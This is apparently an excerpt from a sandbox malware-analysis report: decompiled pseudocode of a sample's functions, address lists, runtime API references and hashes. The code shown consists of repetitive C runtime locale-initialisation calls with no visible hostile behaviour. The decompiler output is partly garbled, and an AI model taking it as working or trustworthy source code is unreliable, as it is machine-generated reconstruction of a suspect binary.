				_t403 = _t402 | E009B4CB1(_t390, __edi, _t402, _t477 - 8, 1, _t390, 0x45, __edi + 0x3c);
				_t404 = _t403 | E009B4CB1(_t390, __edi, _t403, _t477 - 8, 1, _t390, 0x46, __edi + 0x40);
				_t405 = _t404 | E009B4CB1(_t390, __edi, _t404, _t477 - 8, 1, _t390, 0x47, __edi + 0x44);
				_t406 = _t405 | E009B4CB1(_t390, __edi, _t405, _t477 - 8, 1, _t390, 0x48, __edi + 0x48);
				_t407 = _t406 | E009B4CB1(_t390, __edi, _t406, _t477 - 8, 1, _t390, 0x49, __edi + 0x4c);
				_t408 = _t407 | E009B4CB1(_t390, __edi, _t407, _t477 - 8, 1, _t390, 0x4a, __edi + 0x50);
				_t409 = _t408 | E009B4CB1(_t390, __edi, _t408, _t477 - 8, 1, _t390, 0x4b, __edi + 0x54);
				_t410 = _t409 | E009B4CB1(_t390, __edi, _t409, _t477 - 8, 1, _t390, 0x4c, __edi + 0x58);
				_t411 = _t410 | E009B4CB1(_t390, __edi, _t410, _t477 - 8, 1, _t390, 0x4d, __edi + 0x5c);
				_t412 = _t411 | E009B4CB1(_t390, __edi, _t411, _t477 - 8, 1, _t390, 0x4e, __edi + 0x60);
				_t413 = _t412 | E009B4CB1(_t390, __edi, _t412, _t477 - 8, 1, _t390, 0x4f, __edi + 0x64);
				_t414 = _t413 | E009B4CB1(_t390, __edi, _t413, _t477 - 8, 1, _t390, 0x38, __edi + 0x68);
				_t415 = _t414 | E009B4CB1(_t390, __edi, _t414, _t477 - 8, 1, _t390, 0x39, __edi + 0x6c);
				_t416 = _t415 | E009B4CB1(_t390, __edi, _t415, _t477 - 8, 1, _t390, 0x3a, __edi + 0x70);
				_t417 = _t416 | E009B4CB1(_t390, __edi, _t416, _t477 - 8, 1, _t390, 0x3b, __edi + 0x74);
				_t418 = _t417 | E009B4CB1(_t390, __edi, _t417, _t477 - 8, 1, _t390, 0x3c, __edi + 0x78);
				_t419 = _t418 | E009B4CB1(_t390, __edi, _t418, _t477 - 8, 1, _t390, 0x3d, __edi + 0x7c);
				_t420 = _t419 | E009B4CB1(_t390, __edi, _t419, _t477 - 8, 1, _t390, 0x3e, __edi + 0x80);
				_t421 = _t420 | E009B4CB1(_t390, __edi, _t420, _t477 - 8, 1, _t390, 0x3f, __edi + 0x84);
				_t232 = __edi + 0x88;
				_push(_t232);
				_push(0x40);
				_push(_t390);
				_push(1);
				 *((intOrPtr*)(_t477 - 0x17af07bb)) =  *((intOrPtr*)(_t477 - 0x17af07bb)) + _t392;
				_t395 = __edi +  *((intOrPtr*)(_t393 - 0x3b7c0001));
				_push(_t232);
				_t422 = _t421 | _t232;
				_t423 = _t422 | E009B4CB1(_t390, _t395, _t422, _t477 - 8, 1, _t390, 0x41, _t395 + 0x8c);
				_t424 = _t423 | E009B4CB1(_t390, _t395, _t423, _t477 - 8, 1, _t390, 0x42, _t395 + 0x90);
				_t425 = _t424 | E009B4CB1(_t390, _t395, _t424, _t477 - 8, 1, _t390, 0x43, _t395 + 0x94);
				_t426 = _t425 | E009B4CB1(_t390, _t395, _t425, _t477 - 8, 1, _t390, 0x28, _t395 + 0x98);
				_t427 = _t426 | E009B4CB1(_t390, _t395, _t426, _t477 - 8, 1, _t390, 0x29, _t395 + 0x9c);
				_t428 = _t427 | E009B4CB1(_t390, _t395, _t427, _t477 - 8, 1, _t390, 0x1f, _t395 + 0xa0);
				_t429 = _t428 | E009B4CB1(_t390, _t395, _t428, _t477 - 8, 1, _t390, 0x20, _t395 + 0xa4);
				_t430 = _t429 | E009B4CB1(_t390, _t395, _t429, _t477 - 8, 1, _t390, 0x1003, _t395 + 0xa8);
				_t431 = _t430 | E009B4CB1(_t390, _t395, _t430, _t477 - 8, 0, _t390, 0x1009, _t395 + 0xac);
				_t432 = _t431 | E009B4CB1(_t390, _t395, _t431, _t477 - 8, 2, _t390, 0x31, _t395 + 0xb8);
				_t433 = _t432 | E009B4CB1(_t390, _t395, _t432, _t477 - 8, 2, _t390, 0x32, _t395 + 0xbc);
				_t434 = _t433 | E009B4CB1(_t390, _t395, _t433, _t477 - 8, 2, _t390, 0x33, _t395 + 0xc0);
				_t435 = _t434 | E009B4CB1(_t390, _t395, _t434, _t477 - 8, 2, _t390, 0x34, _t395 + 0xc4);
				_t436 = _t435 | E009B4CB1(_t390, _t395, _t435, _t477 - 8, 2, _t390, 0x35, _t395 + 0xc8);
				_t437 = _t436 | E009B4CB1(_t390, _t395, _t436, _t477 - 8, 2, _t390, 0x36, _t395 + 0xcc);
				_t438 = _t437 | E009B4CB1(_t390, _t395, _t437, _t477 - 8, 2, _t390, 0x37, _t395 + 0xb4);
				_t439 = _t438 | E009B4CB1(_t390, _t395, _t438, _t477 - 8, 2, _t390, 0x2a, _t395 + 0xd4);
				_t440 = _t439 | E009B4CB1(_t390, _t395, _t439, _t477 - 8, 2, _t390, 0x2b, _t395 + 0xd8);
				_t441 = _t440 | E009B4CB1(_t390, _t395, _t440, _t477 - 8, 2, _t390, 0x2c, _t395 + 0xdc);
				_t442 = _t441 | E009B4CB1(_t390, _t395, _t441, _t477 - 8, 2, _t390, 0x2d, _t395 + 0xe0);
				_t443 = _t442 | E009B4CB1(_t390, _t395, _t442, _t477 - 8, 2, _t390, 0x2e, _t395 + 0xe4);
				_t444 = _t443 | E009B4CB1(_t390, _t395, _t443, _t477 - 8, 2, _t390, 0x2f, _t395 + 0xe8);
				_t445 = _t444 | E009B4CB1(_t390, _t395, _t444, _t477 - 8, 2, _t390, 0x30, _t395 + 0xd0);
				E009B4CB1(_t390, _t395, _t445 | E009B4CB1(_t390, _t395, _t444 | E009B4CB1(_t390, _t395, _t444, _t477 - 8, 2, _t390, 0x30, _t395 + 0xd0), _t477 - 8, 2, _t390, 0x44, _t395 + 0xec), _t477 - 8, 2, _t390, 0x45, _t395 + 0xf0);
				_t308 = _t395 + 0xf4;
				 *_t308 =  *_t308 + _t308;
				 *((intOrPtr*)(_t308 + 0x6a)) =  *((intOrPtr*)(_t308 + 0x6a)) + _t393;
				_push(_t390);
				_push(2);
				_push(_t477 - 8);
				_t450 = 0xfffffffff00c03c0 | E009B4CB1(_t390, _t395, 0xfffffffff00c03c0);
				_t451 = _t450 | E009B4CB1(_t390, _t395, _t450, _t477 - 8, 2, _t390, 0x47, _t395 + 0xf8);
				_t452 = _t451 | E009B4CB1(_t390, _t395, _t451, _t477 - 8, 2, _t390, 0x48, _t395 + 0xfc);
				_t453 = _t452 | E009B4CB1(_t390, _t395, _t452, _t477 - 8, 2, _t390, 0x49, _t395 + 0x100);
				_t454 = _t453 | E009B4CB1(_t390, _t395, _t453, _t477 - 8, 2, _t390, 0x4a, _t395 + 0x104);
				_t455 = _t454 | E009B4CB1(_t390, _t395, _t454, _t477 - 8, 2, _t390, 0x4b, _t395 + 0x108);
				_t456 = _t455 | E009B4CB1(_t390, _t395, _t455, _t477 - 8, 2, _t390, 0x4c, _t395 + 0x10c);
				_t457 = _t456 | E009B4CB1(_t390, _t395, _t456, _t477 - 8, 2, _t390, 0x4d, _t395 + 0x110);
				_t458 = _t457 | E009B4CB1(_t390, _t395, _t457, _t477 - 8, 2, _t390, 0x4e, _t395 + 0x114);
				_t459 = _t458 | E009B4CB1(_t390, _t395, _t458, _t477 - 8, 2, _t390, 0x4f, _t395 + 0x118);
				_t460 = _t459 | E009B4CB1(_t390, _t395, _t459, _t477 - 8, 2, _t390, 0x38, _t395 + 0x11c);
				_t461 = _t460 | E009B4CB1(_t390, _t395, _t460, _t477 - 8, 2, _t390, 0x39, _t395 + 0x120);
				_t462 = _t461 | E009B4CB1(_t390, _t395, _t461, _t477 - 8, 2, _t390, 0x3a, _t395 + 0x124);
				_t463 = _t462 | E009B4CB1(_t390, _t395, _t462, _t477 - 8, 2, _t390, 0x3b, _t395 + 0x128);
				_t464 = _t463 | E009B4CB1(_t390, _t395, _t463, _t477 - 8, 2, _t390, 0x3c, _t395 + 0x12c);
				_t465 = _t464 | E009B4CB1(_t390, _t395, _t464, _t477 - 8, 2, _t390, 0x3d, _t395 + 0x130);
				_t466 = _t465 | E009B4CB1(_t390, _t395, _t465, _t477 - 8, 2, _t390, 0x3e, _t395 + 0x134);
				_t467 = _t466 | E009B4CB1(_t390, _t395, _t466, _t477 - 8, 2, _t390, 0x3f, _t395 + 0x138);
				_t468 = _t467 | E009B4CB1(_t390, _t395, _t467, _t477 - 8, 2, _t390, 0x40, _t395 + 0x13c);
				_t469 = _t468 | E009B4CB1(_t390, _t395, _t468, _t477 - 8, 2, _t390, 0x41, _t395 + 0x140);
				_t470 = _t469 | E009B4CB1(_t390, _t395, _t469, _t477 - 8, 2, _t390, 0x42, _t395 + 0x144);
				_t471 = _t470 | E009B4CB1(_t390, _t395, _t470, _t477 - 8, 2, _t390, 0x43, _t395 + 0x148);
				_t472 = _t471 | E009B4CB1(_t390, _t395, _t471, _t477 - 8, 2, _t390, 0x28, _t395 + 0x14c);
				_t473 = _t472 | E009B4CB1(_t390, _t395, _t472, _t477 - 8, 2, _t390, 0x29, _t395 + 0x150);
				_t474 = _t473 | E009B4CB1(_t390, _t395, _t473, _t477 - 8, 2, _t390, 0x1f, _t395 + 0x154);
				_t475 = _t474 | E009B4CB1(_t390, _t395, _t474, _t477 - 8, 2, _t390, 0x20, _t395 + 0x158);
				_t389 = E009B4CB1(_t390, _t395, _t475, _t477 - 8, 2, _t390, 0x1003, _t395 + 0x15c) | _t475;
				return _t389;
			}





















































































                                                          0x009a3663
                                                          0x009a3663
                                                          0x009b90b6
                                                          0x009b90ca
                                                          0x009b90de
                                                          0x009b90f2
                                                          0x009b9109
                                                          0x009b911d
                                                          0x009b9131
                                                          0x009b9145
                                                          0x009b915c
                                                          0x009b9170
                                                          0x009b9184
                                                          0x009b9198
                                                          0x009b91af
                                                          0x009b91c3
                                                          0x009b91d7
                                                          0x009b91eb
                                                          0x009b9202
                                                          0x009b9216
                                                          0x009b922a
                                                          0x009b923e
                                                          0x009b9255
                                                          0x009b9269
                                                          0x009b9280
                                                          0x009b9297
                                                          0x009b9299
                                                          0x009b929f
                                                          0x009b92a0
                                                          0x009b92a2
                                                          0x009b92a3
                                                          0x009b92a4
                                                          0x009b92aa
                                                          0x009b92b0
                                                          0x009b92b1
                                                          0x009b92c8
                                                          0x009b92df
                                                          0x009b92f6
                                                          0x009b9310
                                                          0x009b9327
                                                          0x009b933e
                                                          0x009b9355
                                                          0x009b9372
                                                          0x009b938c
                                                          0x009b93a3
                                                          0x009b93ba
                                                          0x009b93d4
                                                          0x009b93eb
                                                          0x009b9402
                                                          0x009b9419
                                                          0x009b9433
                                                          0x009b944a
                                                          0x009b9461
                                                          0x009b9478
                                                          0x009b9492
                                                          0x009b94a9
                                                          0x009b94c0
                                                          0x009b94d7
                                                          0x009b9503
                                                          0x009b950a
                                                          0x009b950d
                                                          0x009b950f
                                                          0x009b9513
                                                          0x009b9517
                                                          0x009b9519
                                                          0x009b951f
                                                          0x009b9536
                                                          0x009b9550
                                                          0x009b9567
                                                          0x009b957e
                                                          0x009b9595
                                                          0x009b95af
                                                          0x009b95c6
                                                          0x009b95dd
                                                          0x009b95f4
                                                          0x009b960e
                                                          0x009b9625
                                                          0x009b963c
                                                          0x009b9653
                                                          0x009b966d
                                                          0x009b9684
                                                          0x009b969b
                                                          0x009b96b2
                                                          0x009b96cc
                                                          0x009b96e3
                                                          0x009b96fa
                                                          0x009b9711
                                                          0x009b972b
                                                          0x009b9742
                                                          0x009b9759
                                                          0x009b9770
                                                          0x009b978d
                                                          0x009b9795

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90AE
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90C5
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90D9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90ED
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9101
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9118
                                                          • ___getlocaleinfo.LIBCMT ref: 009B912C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9140
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9154
                                                          • ___getlocaleinfo.LIBCMT ref: 009B916B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B917F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9193
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91BE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91FA
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9211
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9225
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9239
                                                          • ___getlocaleinfo.LIBCMT ref: 009B924D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9264
                                                          • ___getlocaleinfo.LIBCMT ref: 009B927B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9292
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92A9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d759e5674001a84f0b18ca5f04d9a2ed76447e3db9bf8deeb58554736b45e393
                                                          • Instruction ID: 10357514cfec4c5aa36968ffa3056d483bde9b149d2796770ee827bb6a0f6d53
                                                          • Opcode Fuzzy Hash: d759e5674001a84f0b18ca5f04d9a2ed76447e3db9bf8deeb58554736b45e393
                                                          • Instruction Fuzzy Hash: 1822D9B3D4120D7AE72297F0CD86FEBBBACA704B40F044622F745E7481FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A419C Relevance: 78.5, APIs: 52, Instructions: 492COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E009A419C(signed int __eax, void* __ecx, void* __edx, void* __edi, signed int __esi) {
				void* __ebx;
				signed int _t183;
				intOrPtr* _t187;
				signed int _t268;
				void* _t269;
				void* _t272;
				void* _t274;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t340;

				_t272 = __edx;
				 *((intOrPtr*)(_t332 - 0x17af07bb)) =  *((intOrPtr*)(_t332 - 0x17af07bb)) + __ecx;
				_t274 = __edi +  *((intOrPtr*)(__edx - 0x3b7c0001));
				_push(__eax);
				_t277 = __esi | __eax;
				_t278 = _t277 | E009B4CB1(_t269, _t274, _t277, _t332 - 8, 1, _t269, 0x41, _t274 + 0x8c);
				_t279 = _t278 | E009B4CB1(_t269, _t274, _t278, _t332 - 8, 1, _t269, 0x42, _t274 + 0x90);
				_t280 = _t279 | E009B4CB1(_t269, _t274, _t279, _t332 - 8, 1, _t269, 0x43, _t274 + 0x94);
				_t281 = _t280 | E009B4CB1(_t269, _t274, _t280, _t332 - 8, 1, _t269, 0x28, _t274 + 0x98);
				_t282 = _t281 | E009B4CB1(_t269, _t274, _t281, _t332 - 8, 1, _t269, 0x29, _t274 + 0x9c);
				_t283 = _t282 | E009B4CB1(_t269, _t274, _t282, _t332 - 8, 1, _t269, 0x1f, _t274 + 0xa0);
				_t284 = _t283 | E009B4CB1(_t269, _t274, _t283, _t332 - 8, 1, _t269, 0x20, _t274 + 0xa4);
				_t285 = _t284 | E009B4CB1(_t269, _t274, _t284, _t332 - 8, 1, _t269, 0x1003, _t274 + 0xa8);
				_t286 = _t285 | E009B4CB1(_t269, _t274, _t285, _t332 - 8, 0, _t269, 0x1009, _t274 + 0xac);
				_t287 = _t286 | E009B4CB1(_t269, _t274, _t286, _t332 - 8, 2, _t269, 0x31, _t274 + 0xb8);
				_t288 = _t287 | E009B4CB1(_t269, _t274, _t287, _t332 - 8, 2, _t269, 0x32, _t274 + 0xbc);
				_t289 = _t288 | E009B4CB1(_t269, _t274, _t288, _t332 - 8, 2, _t269, 0x33, _t274 + 0xc0);
				_t290 = _t289 | E009B4CB1(_t269, _t274, _t289, _t332 - 8, 2, _t269, 0x34, _t274 + 0xc4);
				_t291 = _t290 | E009B4CB1(_t269, _t274, _t290, _t332 - 8, 2, _t269, 0x35, _t274 + 0xc8);
				_t292 = _t291 | E009B4CB1(_t269, _t274, _t291, _t332 - 8, 2, _t269, 0x36, _t274 + 0xcc);
				_t293 = _t292 | E009B4CB1(_t269, _t274, _t292, _t332 - 8, 2, _t269, 0x37, _t274 + 0xb4);
				_t294 = _t293 | E009B4CB1(_t269, _t274, _t293, _t332 - 8, 2, _t269, 0x2a, _t274 + 0xd4);
				_t295 = _t294 | E009B4CB1(_t269, _t274, _t294, _t332 - 8, 2, _t269, 0x2b, _t274 + 0xd8);
				_t296 = _t295 | E009B4CB1(_t269, _t274, _t295, _t332 - 8, 2, _t269, 0x2c, _t274 + 0xdc);
				_t297 = _t296 | E009B4CB1(_t269, _t274, _t296, _t332 - 8, 2, _t269, 0x2d, _t274 + 0xe0);
				_t298 = _t297 | E009B4CB1(_t269, _t274, _t297, _t332 - 8, 2, _t269, 0x2e, _t274 + 0xe4);
				_t299 = _t298 | E009B4CB1(_t269, _t274, _t298, _t332 - 8, 2, _t269, 0x2f, _t274 + 0xe8);
				_t300 = _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0);
				_t183 = E009B4CB1(_t269, _t274, _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0), _t332 - 8, 2, _t269, 0x44, _t274 + 0xec);
				_t340 = _t334 + 0x1e0;
				E009B4CB1(_t269, _t274, _t300 | _t183, _t332 - 8, 2, _t269, 0x45, _t274 + 0xf0);
				_t187 = _t274 + 0xf4;
				 *_t187 =  *_t187 + _t187;
				 *((intOrPtr*)(_t187 + 0x6a)) =  *((intOrPtr*)(_t187 + 0x6a)) + _t272;
				_t304 = _t340 + 1;
				_push(_t269);
				_push(2);
				_push(_t332 - 8);
				_t305 = _t304 | E009B4CB1(_t269, _t274, _t304);
				_t306 = _t305 | E009B4CB1(_t269, _t274, _t305, _t332 - 8, 2, _t269, 0x47, _t274 + 0xf8);
				_t307 = _t306 | E009B4CB1(_t269, _t274, _t306, _t332 - 8, 2, _t269, 0x48, _t274 + 0xfc);
				_t308 = _t307 | E009B4CB1(_t269, _t274, _t307, _t332 - 8, 2, _t269, 0x49, _t274 + 0x100);
				_t309 = _t308 | E009B4CB1(_t269, _t274, _t308, _t332 - 8, 2, _t269, 0x4a, _t274 + 0x104);
				_t310 = _t309 | E009B4CB1(_t269, _t274, _t309, _t332 - 8, 2, _t269, 0x4b, _t274 + 0x108);
				_t311 = _t310 | E009B4CB1(_t269, _t274, _t310, _t332 - 8, 2, _t269, 0x4c, _t274 + 0x10c);
				_t312 = _t311 | E009B4CB1(_t269, _t274, _t311, _t332 - 8, 2, _t269, 0x4d, _t274 + 0x110);
				_t313 = _t312 | E009B4CB1(_t269, _t274, _t312, _t332 - 8, 2, _t269, 0x4e, _t274 + 0x114);
				_t314 = _t313 | E009B4CB1(_t269, _t274, _t313, _t332 - 8, 2, _t269, 0x4f, _t274 + 0x118);
				_t315 = _t314 | E009B4CB1(_t269, _t274, _t314, _t332 - 8, 2, _t269, 0x38, _t274 + 0x11c);
				_t316 = _t315 | E009B4CB1(_t269, _t274, _t315, _t332 - 8, 2, _t269, 0x39, _t274 + 0x120);
				_t317 = _t316 | E009B4CB1(_t269, _t274, _t316, _t332 - 8, 2, _t269, 0x3a, _t274 + 0x124);
				_t318 = _t317 | E009B4CB1(_t269, _t274, _t317, _t332 - 8, 2, _t269, 0x3b, _t274 + 0x128);
				_t319 = _t318 | E009B4CB1(_t269, _t274, _t318, _t332 - 8, 2, _t269, 0x3c, _t274 + 0x12c);
				_t320 = _t319 | E009B4CB1(_t269, _t274, _t319, _t332 - 8, 2, _t269, 0x3d, _t274 + 0x130);
				_t321 = _t320 | E009B4CB1(_t269, _t274, _t320, _t332 - 8, 2, _t269, 0x3e, _t274 + 0x134);
				_t322 = _t321 | E009B4CB1(_t269, _t274, _t321, _t332 - 8, 2, _t269, 0x3f, _t274 + 0x138);
				_t323 = _t322 | E009B4CB1(_t269, _t274, _t322, _t332 - 8, 2, _t269, 0x40, _t274 + 0x13c);
				_t324 = _t323 | E009B4CB1(_t269, _t274, _t323, _t332 - 8, 2, _t269, 0x41, _t274 + 0x140);
				_t325 = _t324 | E009B4CB1(_t269, _t274, _t324, _t332 - 8, 2, _t269, 0x42, _t274 + 0x144);
				_t326 = _t325 | E009B4CB1(_t269, _t274, _t325, _t332 - 8, 2, _t269, 0x43, _t274 + 0x148);
				_t327 = _t326 | E009B4CB1(_t269, _t274, _t326, _t332 - 8, 2, _t269, 0x28, _t274 + 0x14c);
				_t328 = _t327 | E009B4CB1(_t269, _t274, _t327, _t332 - 8, 2, _t269, 0x29, _t274 + 0x150);
				_t329 = _t328 | E009B4CB1(_t269, _t274, _t328, _t332 - 8, 2, _t269, 0x1f, _t274 + 0x154);
				_t330 = _t329 | E009B4CB1(_t269, _t274, _t329, _t332 - 8, 2, _t269, 0x20, _t274 + 0x158);
				_t268 = E009B4CB1(_t269, _t274, _t330, _t332 - 8, 2, _t269, 0x1003, _t274 + 0x15c) | _t330;
				return _t268;
			}































































                                                          0x009a419c
                                                          0x009b92a4
                                                          0x009b92aa
                                                          0x009b92b0
                                                          0x009b92b1
                                                          0x009b92c8
                                                          0x009b92df
                                                          0x009b92f6
                                                          0x009b9310
                                                          0x009b9327
                                                          0x009b933e
                                                          0x009b9355
                                                          0x009b9372
                                                          0x009b938c
                                                          0x009b93a3
                                                          0x009b93ba
                                                          0x009b93d4
                                                          0x009b93eb
                                                          0x009b9402
                                                          0x009b9419
                                                          0x009b9433
                                                          0x009b944a
                                                          0x009b9461
                                                          0x009b9478
                                                          0x009b9492
                                                          0x009b94a9
                                                          0x009b94c0
                                                          0x009b94d7
                                                          0x009b94e9
                                                          0x009b94ee
                                                          0x009b9503
                                                          0x009b950a
                                                          0x009b950d
                                                          0x009b950f
                                                          0x009b9512
                                                          0x009b9513
                                                          0x009b9517
                                                          0x009b9519
                                                          0x009b951f
                                                          0x009b9536
                                                          0x009b9550
                                                          0x009b9567
                                                          0x009b957e
                                                          0x009b9595
                                                          0x009b95af
                                                          0x009b95c6
                                                          0x009b95dd
                                                          0x009b95f4
                                                          0x009b960e
                                                          0x009b9625
                                                          0x009b963c
                                                          0x009b9653
                                                          0x009b966d
                                                          0x009b9684
                                                          0x009b969b
                                                          0x009b96b2
                                                          0x009b96cc
                                                          0x009b96e3
                                                          0x009b96fa
                                                          0x009b9711
                                                          0x009b972b
                                                          0x009b9742
                                                          0x009b9759
                                                          0x009b9770
                                                          0x009b978d
                                                          0x009b9795

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
